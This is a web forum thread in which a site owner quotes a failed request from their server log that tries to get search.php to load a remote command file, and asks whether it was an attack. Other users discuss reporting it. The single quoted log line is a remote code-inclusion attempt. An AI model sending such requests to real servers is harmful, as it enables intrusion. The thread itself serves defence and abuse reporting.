SitePoint Sponsor

User Tag List

Results 1 to 5 of 5
  1. #1
    $this->toCD-R(LP); vinyl-junkie's Avatar
    Join Date
    Dec 2003
    Location
    Federal Way, Washington (USA)
    Posts
    1,524
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Is This a XSS Attempt?

    I noticed an interesting entry in my server log today, thankfully a 404:
    Code:
    /search.php=http://hux0x.topcities.com/cmd1.txt
    I checked out the URL, and it looks like someone is being a very bad boy.

    I assume this is an example of a cross-site scripting attempt? Is it possible they would have gotten anywhere with this script if I had register globals turned on? Do you think it would do any good to report this activity to this person's ISP?
    Music Around The World - Collecting tips, trade
    and want lists, album reviews, & more
    Showcase your music collection on the Web

  2. #2
    ********* Wizard silver trophy Cam's Avatar
    Join Date
    Aug 2002
    Location
    Burpengary, Australia
    Posts
    4,495
    Mentioned
    0 Post(s)
    Tagged
    1 Thread(s)
    This is probably better suited to the security forum.

    Yeah for sure report them to their ISP!

  3. #3
    With More ! for your $ maxor's Avatar
    Join Date
    Feb 2004
    Location
    Scottsdale, Arizona
    Posts
    909
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    BWAHAHA

    This part was very funny to me...
    Linux Local Kernel Exploit copiado com sucesso
    Stupid script kiddies

  4. #4
    SitePoint Enthusiast
    Join Date
    Jul 2004
    Location
    Massachussetts, US
    Posts
    76
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    It looks as if the person is trying to find a exploit to use search.php as a proxy.

  5. #5
    $this->toCD-R(LP); vinyl-junkie's Avatar
    Join Date
    Dec 2003
    Location
    Federal Way, Washington (USA)
    Posts
    1,524
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Just a follow-up on this thread. I filed an abuse report with this person's ISP a few weeks ago. I checked on their site just now, and a page comes up that says the site is temporarily unavailable, either because they don't have an index.html page (which they are required to have for a free account), or they have been suspended because they are over their bandwidth limit.

    Personally, I don't care what the reason is, just so long as they're shut down.
    Music Around The World - Collecting tips, trade
    and want lists, album reviews, & more
    Showcase your music collection on the Web


Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •